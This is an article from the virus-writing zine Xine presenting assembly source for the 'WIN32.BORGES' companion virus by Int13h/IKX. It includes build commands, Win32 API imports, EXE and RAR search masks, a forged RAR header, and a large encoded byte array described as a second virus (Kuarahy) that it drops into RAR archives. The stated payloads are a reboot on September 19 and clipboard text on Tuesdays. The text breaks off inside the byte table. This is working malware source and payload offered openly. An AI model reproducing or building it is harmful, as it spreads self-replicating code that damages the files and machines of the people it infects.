/-----------------------------\ | Xine - issue #4 - Phile 206 | \-----------------------------/ ; ; ; ------------> WIN32.BORGES Virus ver 2.0 by Int13h/IKX <-------------; ; EXE Companion with directory navigation. It drops a virus over RAR; ; archives. On setember 19 reboots the machine and on tuesdays puts a; ; text in the clipboard. ­Jorge Luis Borges se merec¡a el Premio Nobel!; ; PUTRIDO SUECO COMITE NOBEL ; ; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - cd13- -; ; ; ; COMPILATION: ; ; tasm32 /ml /m3 borges.asm,,; ; ; tlink32 /Tpe /aa /c /v borges.obj,,, import32.lib, ; ; .386 .model flat locals extrn FindFirstFileA:PROC extrn FindNextFileA:PROC extrn SetCurrentDirectoryA:PROC extrn GetCurrentDirectoryA:PROC extrn GetSystemTime:PROC extrn MoveFileA:PROC extrn CopyFileA:PROC extrn CreateFileA:PROC extrn WriteFile:PROC extrn SetFilePointer:PROC extrn CloseHandle:PROC extrn GlobalAlloc:PROC extrn GlobalLock:PROC extrn GlobalUnlock:PROC extrn OpenClipboard:PROC extrn SetClipboardData:PROC extrn EmptyClipboard:PROC extrn CloseClipboard:PROC extrn GetTickCount:PROC extrn GetCommandLineA:PROC extrn CreateProcessA:PROC extrn lstrcpyA:PROC extrn MessageBoxA:PROC extrn ExitWindowsEx:PROC extrn ExitProcess:PROC HeaderSize equ FinRARHeader-RARHeader Size equ 4774 .DATA TituloVentana db 'WIN32.BORGES VIRUS 2.0 by Int13h/IKX',0 TextoVentana db 'Made in Paraguay, South America',0 Posicion dd 0 MemHandle dd 0 FileHandle dd 0 Chequeo dd 0 Number dd 0 Victimas db '*.EXE',0 Victimas2 db '*.RAR',0 RARHeader: RARHeaderCRC dw 0 RARType db 074h RARFlags dw 8000h RARHeadsize dw HeaderSize RARCompressed dd Size RAROriginal dd Size RAROs db 0 RARCrc32 dd 0 RARFileTime db 063h,078h RARFileDate db 031h,024h RARNeedVer db 014h RARMethod db 030h RARFnameSize dw FinRARHeader-RARName RARAttrib dd 0 RARName db "KUARAHY.EXE" FinRARHeader label byte SearcHandle1 dd 0 SearcHandle2 dd 0 Longitud dd 0 ProcessInfo dd 4 dup (0) StartupInfo dd 4 dup (0) Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0 Hallado db 200 dup (0) Crear db 200 dup (0) ParaCorrer db 200 dup (0) Original db 200 dup (0) Actual db 200 dup (0) PuntoPunto db '..',0 SystemTimeStruc dw 0,0,0,0,0,0,0,0 Kuarahy2: ; Virus to drop: Kuarahy 1.1 com/exe/sys/obj/ovl/bat/arj/rar/bs/mbr db 0ebh,03ch,090h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h db 000h,000h,0bfh,04dh,001h,0b9h,0d8h,000h,02eh,081h,035h,0feh,0d2h,047h,047h db 0e2h,0f7h,07fh,0ech,0feh,0d2h,033h,0f2h,08bh,0d1h,017h,07ah,0ffh,0f9h,03eh db 028h,070h,002h,042h,0d2h,082h,029h,002h,0c4h,0e1h,01fh,0ech,0ffh,0f2h,0d2h db 05dh,0c1h,0fah,063h,0f8h,001h,01eh,05ch,03eh,06ch,0feh,0aeh,0cdh,02dh,047h db 0d2h,0ffh,021h,05bh,06ah,0f7h,0d0h,045h,0d2h,0fch,0f4h,07eh,0ech,057h,0d2h db 0b8h,0a6h,0f6h,06bh,0fdh,0d2h,044h,052h,0feh,039h,0fbh,06bh,0fch,082h,0d5h db 000h,033h,0c1h,046h,0dbh,0fch,01fh,0edh,0a1h,0fdh,03bh,05bh,0d2h,0f8h,069h db 052h,0d2h,0adh,019h,0b6h,081h,0feh,06ah,0deh,0d2h,016h,09ch,0ffh,0fch,038h db 0d4h,055h,0d2h,0feh,0f4h,038h,0d4h,054h,0d2h,0adh,0f4h,038h,0d4h,04bh,0d9h db 0b0h,073h,0b2h,0d2h,0d8h,071h,062h,0d3h,039h,0d4h,0b2h,0d2h,08fh,0d3h,05fh db 09ch,0feh,0f4h,05dh,04ch,0ffh,05eh,0f8h,09ch,0feh,06ah,0ffh,0d0h,045h,064h db 0ech,06bh,0ffh,0d2h,044h,052h,0feh,04eh,0d0h,02dh,0e0h,04eh,0ffh,0a0h,0a6h db 0f4h,07fh,06dh,0b5h,0d2h,01ch,025h,08ah,09dh,0d8h,014h,0f8h,07bh,0feh,09ah db 0e0h,0d4h,0e1h,0e1h,001h,06ah,0ffh,0d1h,045h,064h,0ech,06bh,0fch,0d2h,044h db 052h,0feh,01fh,0edh,0fch,038h,0d4h,0ech,0deh,09ch,085h,0e0h,0d4h,043h,0ddh db 0fch,03ah,049h,0d9h,0f9h,0cdh,0a1h,06ch,089h,0c2h,045h,0b1h,0ebh,03ah,0e2h db 0ddh,046h,0dbh,0fdh,069h,09dh,0c5h,047h,0d1h,0feh,068h,07eh,0d2h,033h,0c1h db 07dh,02dh,0deh,0a7h,0ffh,011h,0e1h,0f4h,038h,0d4h,057h,0d2h,0b8h,0f4h,07eh db 0ech,057h,0d2h,0b8h,0a6h,0f6h,068h,07eh,0d2h,047h,0d0h,0feh,039h,0fbh,0e1h db 02ch,06bh,0ffh,082h,0e0h,0d5h,045h,0d2h,082h,06ah,0ffh,0d0h,033h,0c1h,046h db 0d3h,0fch,01fh,0edh,038h,0feh,0aeh,0feh,0d2h,016h,08dh,0f3h,0efh,0edh,01fh db 08bh,0d1h,017h,0cbh,0f3h,052h,002h,0d1h,08bh,0d1h,017h,0d3h,0f5h,052h,002h db 0d0h,08bh,0c0h,07dh,02bh,0ffh,0a7h,0f3h,057h,02ch,0a7h,0fdh,03bh,0a4h,0dfh db 07fh,028h,07eh,0d2h,08ah,0d7h,014h,0d2h,0feh,0d2h,0feh,083h,04fh,0d0h,033h db 0c1h,0a7h,018h,0fch,0d2h,0aeh,083h,0ach,06ah,0ffh,0d0h,0cdh,000h,047h,0d3h db 0aeh,04eh,0d0h,02dh,0e0h,04eh,0ffh,06ah,0ffh,0d0h,062h,0fch,001h,0cch,062h db 0d3h,0a4h,08bh,0a6h,018h,0fch,0d2h,0deh,0ech,0b5h,087h,0bfh,080h,0bfh,09ah db 0a7h,0eeh,0deh,0f2h,0b5h,0bdh,09fh,0f2h,096h,0b3h,0d9h,0b7h,0deh,09bh,090h db 0a6h,0cfh,0e1h,096h,0fdh,0b7h,099h,0a6h,0f2h,08ch,0b7h,093h,0b0h,097h,0b3h db 08eh,0bdh,095h,0a7h,07ch,0f2h,096h,0bbh,090h,0b3h,0dfh,0f2h,0c4h,0fbh,020h db 055h,0aah,0beh,00fh,003h,0b9h,04bh,008h,02eh,081h,034h,038h,03ch,046h,046h db 0e2h,0f7h,005h,01ch,038h,049h,039h,0ffh,0d0h,03ch,038h,061h,0b9h,0d1h,020h db 03eh,016h,0bch,086h,02eh,034h,06fh,04dh,03fh,0d1h,03dh,03eh,084h,02bh,0f1h db 0f5h,01dh,005h,0f1h,02bh,049h,03bh,0d5h,0e9h,03ch,03eh,084h,019h,009h,0f5h db 01dh,016h,0b5h,0a6h,0e7h,03ch,012h,0b4h,0bah,0e5h,038h,016h,0b5h,0a6h,02fh db 034h,012h,0b4h,0bah,02dh,030h,026h,0f9h,026h,03ah,038h,0bch,007h,0d6h,04dh db 022h,0fdh,063h,039h,0bdh,007h,0ach,0a8h,049h,0cah,0bfh,0d3h,00eh,0b9h,003h db 0a8h,0ach,04dh,030h,016h,0b5h,0a6h,02fh,034h,012h,0b4h,0a2h,02dh,030h,0d3h db 033h,0b9h,003h,026h,012h,04dh,035h,0bbh,0ffh,01dh,0bdh,007h,0c6h,0b8h,048h db 0ddh,023h,080h,02fh,0f5h,0f1h,02bh,001h,0f5h,02fh,04dh,015h,06bh,03bh,036h db 023h,0b5h,08ah,0e3h,038h,087h,0e7h,03ch,099h,09dh,0b1h,08eh,02fh,034h,083h db 02bh,030h,09dh,099h,00bh,0fch,0b6h,0fch,0c2h,083h,0bch,03ch,080h,0adh,03ch db 097h,0b3h,0ffh,093h,0c7h,03fh,0d7h,074h,0b0h,0e0h,074h,0b6h,0fch,01eh,09dh db 03bh,03ch,015h,0f9h,03ah,0afh,026h,03bh,08ch,076h,0f5h,01dh,08ch,074h,083h db 0f8h,03ah,0f1h,019h,074h,0b6h,0fch,01eh,0fbh,03eh,03dh,038h,034h,038h,01ah db 0ffh,03ah,030h,03ch,041h,077h,078h,0b2h,0f8h,00fh,0c7h,032h,027h,0b1h,08eh db 03ch,038h,085h,003h,010h,0cbh,098h,01eh,0fah,03eh,089h,033h,072h,03eh,023h db 080h,01dh,01dh,086h,0a9h,038h,0f5h,01dh,03fh,084h,0c6h,0f6h,0f5h,01dh,0b8h db 082h,02ah,030h,07bh,048h,052h,0bch,086h,02eh,034h,07eh,04dh,03fh,0d1h,041h db 038h,0bch,086h,02eh,034h,073h,04dh,03fh,0d1h,037h,039h,00fh,0c7h,0bch,086h db 02eh,034h,07dh,04dh,03fh,0d1h,011h,039h,0bch,086h,02eh,034h,06eh,04dh,03fh db 0d1h,01fh,039h,088h,012h,0f1h,019h,0bch,0c2h,031h,04dh,031h,087h,01ch,038h db 03ah,06dh,0d4h,02ah,03dh,065h,03bh,0a9h,0f1h,02eh,03ah,027h,0b7h,0e5h,0b0h db 0f8h,039h,028h,03ch,016h,03dh,0bfh,04ah,03bh,0c6h,016h,03fh,0bfh,046h,03bh db 0b2h,0e8h,012h,0b3h,09bh,040h,03fh,0c3h,0d4h,021h,03ch,0d3h,03ch,0d2h,02ch db 038h,03ch,038h,02ch,038h,059h,03fh,0d4h,0dbh,034h,0b5h,08ah,0cfh,037h,087h db 03ch,039h,06bh,0c4h,098h,09dh,00fh,0f8h,017h,0e3h,00fh,0f1h,017h,0eah,00fh db 0ceh,017h,0c7h,00fh,0d5h,0ffh,0d0h,0fah,030h,09dh,014h,03ch,0b4h,0b2h,089h db 02ch,0b4h,0b2h,08dh,02ch,0b1h,0bah,091h,02ch,0b4h,0b2h,095h,02ch,0b6h,03ah db 014h,03ch,013h,0fch,087h,03dh,038h,073h,097h,049h,0c4h,07bh,07fh,03ah,027h db 032h,03fh,0b7h,0cfh,0b1h,086h,070h,02ah,085h,0b8h,03ch,0cbh,098h,036h,032h db 027h,03bh,012h,0fch,0b5h,082h,074h,02eh,081h,041h,038h,0ceh,096h,0fbh,07dh db 0c0h,07ah,07dh,0feh,079h,0c6h,068h,086h,0bch,038h,073h,0b2h,032h,0b8h,03ch db 00ah,0d1h,0c6h,0fdh,086h,0bdh,038h,0cfh,09ch,0b1h,08eh,074h,02ah,083h,0b8h db 03ch,094h,000h,035h,048h,03bh,096h,0d3h,0c4h,092h,0bdh,0d7h,0bdh,038h,0b7h db 0f7h,0b4h,036h,0bch,038h,0c6h,084h,04ch,02fh,0c7h,08ch,076h,083h,018h,03ah db 0f1h,019h,0b1h,0aeh,08bh,028h,084h,038h,077h,0b5h,0a2h,091h,02ch,0f5h,01dh db 08ch,071h,0f5h,01dh,08ch,070h,0f5h,01dh,0d0h,012h,030h,0b1h,08eh,068h,03ch db 083h,038h,0c6h,0b3h,0fbh,081h,039h,038h,0cfh,09dh,098h,0b5h,08ah,09eh,02eh db 087h,03ch,039h,06bh,081h,05ch,0d2h,00fh,0e3h,00fh,0eah,0c3h,0d8h,0cfh,09ch db 00fh,0ceh,017h,0c7h,00fh,0f8h,017h,0f1h,0ffh,0d0h,03ch,030h,088h,031h,0b1h db 0aeh,068h,033h,0f1h,019h,085h,022h,03ch,0b5h,08ah,0eeh,02ch,0b3h,0d2h,082h db 07dh,038h,06dh,080h,03ch,029h,087h,038h,032h,081h,03dh,038h,0f1h,028h,07eh db 0bbh,0f9h,036h,065h,0dah,0d1h,0bbh,0c3h,018h,049h,039h,0ffh,0f5h,01ch,0d0h db 003h,032h,001h,02bh,0f1h,04dh,03fh,0d1h,0c5h,031h,001h,0c6h,0f6h,04dh,03fh db 0d1h,060h,033h,0bch,0c4h,077h,04dh,03fh,0d1h,0b0h,038h,0bch,0c4h,06ah,04dh db 03fh,0d1h,0b8h,038h,0bch,0c4h,07fh,04ch,043h,0a8h,0ach,0a8h,0bch,0c4h,001h db 04ch,04bh,005h,03ch,054h,048h,04ah,001h,019h,009h,04ch,028h,005h,01dh,01dh db 048h,022h,001h,038h,06bh,04ch,07bh,005h,03dh,06fh,048h,023h,0d6h,035h,07dh db 022h,03ch,016h,0b7h,026h,0e7h,03ch,012h,0b6h,03ah,0e5h,038h,0f7h,012h,0b1h db 02ah,0e3h,038h,016h,0b0h,026h,0e1h,03ch,0f3h,06ah,06dh,080h,03ch,06fh,0a0h db 016h,0c3h,026h,02fh,034h,0bch,0d9h,023h,0b8h,0c5h,026h,049h,030h,065h,0b8h db 0ddh,0d8h,0bch,0f1h,022h,069h,065h,062h,084h,039h,06bh,0a4h,012h,0c7h,022h db 02bh,030h,0f7h,0a0h,016h,0c3h,026h,02fh,034h,06dh,0b8h,0ddh,027h,0bch,0c1h db 022h,04dh,034h,061h,0bch,0d9h,0dch,0b8h,0f5h,039h,06dh,061h,0f3h,088h,03fh db 0f7h,0a0h,068h,06fh,069h,06eh,06eh,06bh,06dh,022h,03eh,001h,038h,050h,04dh db 036h,0bbh,0c6h,039h,048h,03bh,0d5h,0a8h,03eh,0b3h,0eah,06ah,022h,080h,018h db 00dh,0f1h,019h,012h,0b1h,022h,092h,02eh,016h,0b0h,03eh,090h,02ah,032h,027h db 084h,01ch,019h,082h,009h,03dh,0f1h,019h,023h,062h,012h,0b1h,02ah,096h,02eh db 016h,0b0h,026h,08ch,02ah,0b0h,0e3h,022h,03fh,0c0h,0b3h,0c6h,081h,0bch,038h db 08ch,016h,0ceh,096h,048h,03bh,0d5h,070h,03eh,01eh,0b7h,07dh,0c1h,035h,01ch db 018h,001h,056h,058h,04dh,03fh,0d1h,005h,03ah,001h,059h,052h,04dh,03fh,0d1h db 00dh,03ah,001h,059h,04ah,04dh,03fh,0d1h,015h,03ah,001h,057h,048h,04dh,03fh db 0d1h,01dh,03ah,001h,04ah,058h,04dh,03fh,0d1h,025h,03ah,001h,04ah,049h,04dh db 03fh,0d1h,02dh,03ah,001h,051h,048h,04dh,03fh,0d1h,035h,03ah,001h,04eh,04ch db 04dh,03fh,0d1h,03dh,03ah,001h,051h,052h,04dh,03fh,0d1h,0c5h,039h,001h,054h db 04ch,04dh,03fh,0d1h,0cdh,039h,032h,03fh,082h,08eh,028h,0bfh,0cbh,09dh,098h db 0d0h,048h,03eh,0d4h,0dah,03bh,04bh,03fh,0d1h,0e1h,039h,084h,038h,001h,0a4h db 012h,0c7h,022h,02bh,030h,04bh,03fh,0d1h,0f3h,039h,0afh,036h,023h,0feh,03ah db 091h,03ch,070h,03ah,06bh,084h,018h,02eh,0f5h,013h,080h,02ah,02ah,00eh,0c7h db 01ah,0b2h,021h,0f5h,013h,01eh,0b6h,075h,038h,0b0h,032h,090h,02eh,01eh,0fah db 07dh,038h,018h,01ah,0feh,079h,03ah,03eh,0b1h,002h,08ah,02eh,0b4h,03ah,08ch db 02eh,063h,03bh,080h,03dh,07bh,086h,045h,02ch,013h,0f5h,0a4h,012h,0c7h,022h db 02bh,030h,08ch,07dh,082h,041h,028h,0f1h,019h,088h,079h,086h,0b2h,02ch,0f5h db 01dh,08ch,07dh,082h,0a9h,028h,0f1h,019h,088h,079h,086h,099h,02ch,0f5h,01dh db 080h,03ch,06fh,0a0h,0c7h,022h,02bh,030h,0b1h,032h,018h,030h,0b1h,02ah,011h db 030h,0b1h,02ah,0bah,02eh,0b8h,0ddh,027h,0bch,0c1h,022h,04dh,03fh,0d1h,06dh db 039h,088h,007h,085h,015h,03ch,082h,08ah,02ch,0f1h,019h,0b7h,0cah,0b7h,03ch db 0d5h,050h,038h,06bh,088h,008h,0f1h,019h,067h,004h,03bh,04ah,03fh,0d1h,013h db 039h,0d4h,08eh,039h,0bdh,0eeh,04ch,03fh,0d1h,019h,039h,001h,0a8h,0deh,04eh db 03fh,0d1h,021h,039h,001h,0a2h,03eh,04fh,03fh,0d1h,029h,039h,0bdh,044h,037h db 06fh,068h,04dh,03fh,0d1h,037h,039h,083h,0cfh,037h,09dh,098h,015h,03fh,038h db 09fh,08fh,037h,0b3h,0d4h,0b9h,0f9h,02ah,03fh,0d0h,03ch,03eh,085h,09eh,02eh db 082h,05fh,02dh,088h,078h,0f1h,019h,0d4h,057h,039h,08ch,07ch,081h,03fh,038h db 086h,08eh,037h,0f5h,01dh,0d1h,0ebh,038h,0bch,006h,02eh,034h,06fh,04dh,03fh db 0d1h,0efh,038h,0bfh,044h,024h,078h,04eh,03bh,0d5h,0f2h,03ch,0bbh,040h,022h db 03ch,04ch,03fh,0d1h,0fdh,038h,0bdh,044h,017h,06fh,068h,04dh,03fh,0d1h,08bh db 038h,0d4h,006h,039h,081h,03ch,03ah,0cbh,0c9h,037h,0eah,048h,039h,07ch,001h db 068h,03ah,048h,03bh,0d5h,09ah,03ch,001h,078h,03ch,048h,03bh,0d5h,0a2h,03ch db 0d0h,01dh,03dh,06fh,06ah,06ch,0fch,03ah,0f2h,028h,09bh,048h,03bh,0b0h,03eh db 04ah,03bh,0f8h,03eh,0f8h,02ch,0b0h,03eh,044h,03bh,09fh,042h,03fh,099h,082h db 02ch,08dh,03ch,0efh,0d8h,0afh,060h,066h,068h,06eh,013h,0ffh,0bbh,0e6h,038h db 085h,028h,03ch,0cfh,0cdh,0b1h,02ah,0f2h,028h,0b3h,0d6h,09bh,0f0h,02ch,09fh db 0fch,028h,0ffh,03ah,0feh,028h,038h,03ch,062h,064h,03dh,09ah,02ah,0bfh,0eah db 03ch,089h,035h,068h,0efh,0d0h,0efh,0f2h,037h,0eah,0c5h,02bh,0ech,060h,0bch db 0dch,03dh,0b1h,02ah,082h,028h,09bh,084h,02ch,09dh,0f8h,028h,0c0h,039h,013h db 03dh,04ah,03fh,09bh,0fch,02ch,0fbh,03eh,0feh,02ch,0c3h,0c7h,067h,0b9h,0f9h db 037h,03eh,0d0h,01ah,03dh,085h,09eh,02eh,08ch,07ch,082h,05fh,02dh,0f1h,019h db 0d4h,0adh,038h,08ch,07ch,081h,026h,038h,086h,08eh,028h,0f5h,01dh,0d0h,077h db 03ch,0d4h,025h,03fh,08ch,002h,0f5h,01dh,036h,023h,080h,018h,01dh,012h,0fdh db 02ah,092h,02eh,0f5h,01dh,03fh,023h,065h,063h,066h,066h,061h,067h,060h,0a1h db 016h,0c3h,016h,0e7h,03ch,0bch,006h,02eh,034h,06fh,04dh,0e6h,0b3h,078h,03eh db 09fh,012h,034h,0d0h,067h,03ch,09fh,084h,028h,0b9h,03ah,084h,028h,038h,03eh db 0b3h,0d4h,0b9h,0f9h,037h,03eh,0d0h,0f4h,03ch,085h,09eh,02eh,08ch,07ch,082h db 05fh,02dh,0f1h,019h,0d4h,00fh,038h,08ch,07ch,081h,036h,038h,086h,08eh,028h db 0f5h,01dh,0d3h,09ch,080h,070h,038h,06ch,06bh,06dh,06ah,06ah,03eh,022h,036h db 032h,027h,03bh,080h,02fh,0f5h,0f1h,02bh,001h,0f5h,02fh,04ch,075h,080h,03dh db 03ah,0b1h,0a6h,09ah,02ah,085h,039h,03ch,082h,0bch,038h,0f1h,02bh,01ah,0b9h db 083h,073h,03ch,0dah,0cbh,04ch,00dh,080h,03dh,03bh,085h,03ah,03ch,0f5h,02fh db 01eh,0fbh,0beh,035h,03ah,03ch,038h,0b7h,0cdh,06ah,0b9h,0fah,007h,03ch,0ffh db 038h,075h,040h,063h,0b1h,08eh,04bh,028h,0d4h,0f6h,03bh,080h,035h,03bh,0b1h db 0a6h,03ch,03ah,085h,03bh,03ch,082h,0bch,038h,0f1h,02bh,088h,03ch,0f1h,022h db 0bch,0c2h,02fh,04dh,020h,0d0h,03ch,038h,067h,0b9h,0d7h,0aeh,034h,0b5h,08bh db 06ch,037h,081h,076h,038h,090h,013h,0e7h,08ch,032h,0f5h,02ch,0dah,0cbh,00bh db 0fch,0f5h,02ah,027h,03bh,066h,066h,061h,067h,013h,0fch,0fbh,0bch,006h,02eh db 034h,073h,04ch,03fh,0d1h,031h,0c7h,0d4h,0b7h,03fh,00bh,0c3h,0d0h,0bfh,03dh db 000h,098h,048h,023h,000h,09ah,048h,02fh,000h,0b2h,048h,058h,000h,0b4h,049h db 03bh,0d5h,0cah,0c2h,080h,03dh,07ah,00fh,0f1h,0f1h,019h,04fh,0d9h,0d5h,0deh db 0c2h,06ah,084h,039h,07eh,013h,0f5h,0a1h,0f1h,019h,06eh,068h,088h,007h,085h db 03bh,03ch,082h,079h,02ah,0f1h,019h,037h,0c7h,049h,029h,07bh,0b9h,002h,07eh db 02eh,038h,03dh,04ch,034h,0c2h,0bfh,0fch,03ah,0c3h,0d5h,084h,0c2h,0b9h,03ah db 07eh,02eh,09eh,02eh,062h,065h,069h,06eh,080h,03ch,07ah,0f1h,019h,088h,078h db 086h,07dh,02eh,081h,03fh,038h,0f1h,019h,066h,061h,084h,038h,07eh,0f5h,01dh db 062h,0d7h,09fh,085h,0c7h,0c3h,082h,0c1h,0c7h,084h,039h,07eh,0f5h,01dh,081h db 03ah,038h,086h,0e8h,02ch,08ch,07ch,0f5h,01dh,085h,033h,03bh,0d4h,0bfh,03fh db 08ch,07ch,081h,09ah,02ah,086h,05bh,029h,0f5h,01dh,08ch,07ch,081h,036h,038h db 086h,0feh,02ch,0f5h,01dh,0d1h,05dh,0c6h,0d4h,094h,03eh,03eh,0d4h,045h,03dh db 03fh,088h,006h,0f1h,019h,012h,0fdh,00ah,096h,02eh,087h,0dfh,02ch,0b7h,0efh db 085h,0b8h,03ch,094h,000h,016h,048h,03bh,096h,0dah,0c4h,092h,032h,027h,0fbh db 03dh,07fh,077h,0fbh,07dh,03eh,075h,03ch,08ch,000h,081h,01ch,038h,0f1h,019h db 04fh,03bh,0d5h,00ah,0c2h,0abh,06eh,085h,033h,03bh,0d4h,017h,03fh,081h,09ah db 02ah,088h,078h,086h,05bh,029h,0f5h,01dh,08ch,002h,0f5h,01dh,062h,06eh,080h db 03eh,005h,0a0h,016h,0c3h,026h,02fh,034h,0afh,0d0h,06dh,03ah,088h,006h,0f1h db 019h,066h,080h,03dh,07bh,085h,01bh,03ch,0a4h,012h,0c7h,022h,02bh,030h,0d1h db 0c5h,0c5h,072h,071h,074h,071h,070h,018h,07dh,06bh,06fh,07dh,071h,07ah,070h db 07dh,06eh,018h,071h,079h,075h,06dh,06fh,019h,001h,06bh,05dh,04ch,03fh,0d1h db 0ebh,0c5h,0d4h,05fh,03eh,087h,050h,02ah,085h,03ch,03ch,0d0h,003h,039h,081h db 037h,03fh,0d0h,0f2h,03ah,084h,03ah,07eh,0a1h,00fh,0f1h,0f1h,019h,082h,05bh db 029h,081h,09ah,02ah,0d4h,07ch,038h,0b1h,02ah,066h,02eh,09bh,060h,02ah,082h db 076h,02eh,081h,01ah,038h,0d4h,00ch,038h,09bh,070h,02ah,088h,078h,086h,074h db 02eh,081h,014h,038h,0f1h,019h,0fbh,03eh,070h,02ah,03ch,038h,0fbh,03eh,060h db 02ah,03ch,038h,0fbh,03eh,062h,02ah,03ch,038h,086h,05bh,029h,081h,09ah,02ah db 088h,078h,0f1h,019h,0d5h,04ah,0c1h,0d0h,034h,03ah,083h,0aeh,02eh,081h,038h db 038h,0d4h,0d8h,03ch,085h,033h,03bh,0d4h,057h,03eh,080h,03eh,07ah,00fh,0f1h db 0a5h,0f5h,01dh,0bfh,0f6h,0b3h,0ech,0bbh,0d6h,03ch,0bfh,0e1h,03dh,0bbh,0fdh db 039h,084h,038h,07eh,0f5h,01dh,086h,05fh,02dh,085h,09eh,02eh,0d0h,0efh,03bh db 09fh,0b4h,02eh,0b1h,02ah,0b6h,02eh,08ch,07ch,081h,01eh,038h,086h,04ch,02eh db 0f5h,01dh,081h,014h,038h,082h,040h,02eh,0d0h,085h,03bh,09fh,098h,02eh,0b1h db 02ah,09ah,02eh,08ch,07ch,081h,02ch,038h,086h,0aeh,02eh,0f5h,01dh,0ffh,03ah db 0b4h,02eh,038h,03ch,0ffh,03ah,0b6h,02eh,038h,03ch,0ffh,03ah,098h,02eh,038h db 03ch,0ffh,03ah,09ah,02eh,038h,03ch,08ch,07ch,081h,09ah,02ah,086h,05bh,029h db 0f5h,01dh,0ffh,03ah,04eh,02eh,038h,03ch,08ch,07ch,081h,038h,038h,086h,04ch db 02eh,0f5h,01dh,0d1h,0e1h,0c4h,012h,0fch,002h,08ah,02eh,016h,0b6h,036h,094h db 02ah,01ah,0b0h,071h,03ch,0ffh,005h,071h,062h,049h,03bh,0d5h,0d7h,0c7h,005h db 066h,075h,049h,03bh,0d5h,0dfh,0c7h,0b8h,002h,02ah,030h,07bh,049h,03bh,0d5h db 046h,0c7h,004h,0bch,04dh,03fh,0d1h,0a0h,0c5h,07ch,04dh,03fh,0d1h,0f0h,0c4h db 0bch,006h,02eh,034h,07eh,04dh,03fh,0d1h,000h,0c6h,0bch,006h,02eh,034h,07dh db 04dh,03fh,0d1h,01dh,0c7h,0bch,006h,02eh,034h,06eh,04dh,03fh,0d1h,08ch,0c6h db 0d5h,0b4h,0c0h,069h,085h,021h,03ch,0d0h,021h,039h,039h,078h,03ch,092h,065h db 0dah,0ceh,0fbh,035h,038h,031h,032h,01ch,063h,077h,06dh,07dh,06ah,07dh,070h db 065h,018h,00dh,016h,00dh,018h,05eh,041h,01ch,071h,052h,04ch,00dh,00bh,054h db 017h,075h,073h,064h,065h,01ch,015h,01ch,06fh,04eh,051h,048h,04ch,059h,056h db 01ch,051h,052h,018h,06ch,059h,04eh,059h,05bh,04dh,05dh,041h,01ch,015h,01ch db 068h,050h,05dh,05dh,04bh,059h,018h,04eh,05dh,05bh,051h,04fh,04ch,059h,04ah db 01dh,018h,031h,032h,018h,07ch,073h,06bh,01ch,071h,052h,05eh,059h,05bh,048h db 051h,053h,056h,01ch,075h,05dh,05bh,054h,051h,052h,05dh,03eh,061h,0d5h,087h db 033h,018h,070h,05dh,05dh,04ah,052h,018h,04fh,057h,051h,05dh,01ch,05fh,049h db 059h,04eh,059h,052h,099h,01ch,04fh,053h,04ah,058h,04bh,01dh,002h,077h,04dh db 05dh,04ah,05dh,050h,045h,005h,06fh,04dh,052h,018h,01ch,079h,098h,098h,001h db 07ch,059h,04eh,055h,054h,01ch,018h,077h,04dh,098h,098h,001h,06fh,053h,055h db 05dh,056h,01ch,086h,074h,037h,059h,040h,059h,05bh,053h,055h,04fh,041h,04fh db 057h,05eh,052h,05eh,059h,048h,057h,04ah,054h,05dh,04ah,056h,04ah,05dh,04ah db 06eh,035h,07dh,022h,03ch,016h,0c3h,03eh,06eh,033h,084h,039h,06bh,081h,00bh db 046h,0bch,0d9h,0dch,0b8h,0f5h,026h,086h,0b9h,019h,0a4h,012h,0c7h,022h,02bh db 030h,0fbh,01ch,07dh,011h,055h,05dh,051h,050h,018h,051h,05dh,006h,018h,075h db 056h,048h,009h,00fh,050h,07ch,059h,052h,04ch,055h,04bh,053h,05bh,055h,059h db 050h,016h,05fh,057h,051h,018h,084h,038h,07eh,0d3h,03fh,080h,03eh,07ah,00fh db 0f1h,0a5h,0f5h,01dh,0fbh,032h,036h,023h,03fh,0ffh,06ah,06bh,0ddh,07ch,082h db 056h,038h,0cbh,0dah,039h,03bh,039h,087h,087h,02fh,0bfh,0eah,03ch,0cfh,0cbh db 0b3h,0feh,0cfh,0ddh,0cfh,0cbh,067h,066h,078h,0ffh,016h,0bch,006h,096h,038h db 06fh,04dh,074h,016h,0c2h,03eh,097h,038h,012h,0b8h,002h,093h,03ch,030h,04ah db 003h,022h,068h,06fh,00bh,0fch,0b6h,0e4h,099h,0b8h,038h,0b7h,026h,0bah,038h db 012h,09bh,0e7h,03ch,012h,0b1h,022h,0e5h,038h,016h,09fh,02bh,030h,016h,0b5h db 026h,029h,034h,0c6h,0ffh,03ah,0bch,03ch,0a9h,038h,0b4h,032h,0beh,03ch,0c3h db 012h,0feh,03ah,093h,03ch,038h,012h,0feh,03ah,092h,03ch,076h,067h,060h,023h db 0d1h,0ffh,0cch,0d4h,0bfh,0c3h,0b1h,012h,039h,03eh,0b9h,0d1h,0fah,03dh,0b1h db 012h,007h,03ch,0dch,07ch,0beh,0dch,0dch,07ch,09bh,035h,03ah,00fh,0ceh,083h db 05bh,029h,081h,007h,014h,0cfh,09ch,082h,04ah,02bh,099h,035h,03ah,085h,073h db 034h,009h,038h,07eh,07ah,0dah,0c6h,0dch,07ch,0beh,0dch,0dch,07ch,09bh,07bh db 038h,085h,014h,03dh,0d0h,073h,0c7h,083h,07dh,03ch,005h,058h,038h,04bh,037h db 08dh,039h,084h,0b9h,008h,093h,083h,081h,031h,080h,00dh,03ch,097h,0d3h,01dh db 005h,0f4h,038h,04bh,037h,08dh,03ah,084h,0b9h,010h,093h,083h,081h,031h,080h db 03dh,03ch,097h,0d3h,031h,089h,03fh,080h,0bdh,03ch,097h,087h,085h,035h,084h db 011h,038h,093h,00eh,0d5h,083h,006h,03ch,069h,085h,0c7h,03ch,0d0h,037h,0c7h db 065h,004h,06ch,04fh,029h,088h,087h,092h,083h,071h,03ch,080h,07fh,07bh,097h db 087h,07ah,038h,082h,05ah,02ch,03bh,0cdh,09ch,0d7h,014h,000h,098h,04bh,02dh db 08ch,086h,096h,087h,075h,038h,084h,07eh,07ah,093h,083h,07eh,03ch,086h,059h db 028h,03fh,0c9h,098h,0d3h,02fh,088h,083h,092h,083h,071h,03ch,080h,07bh,07fh db 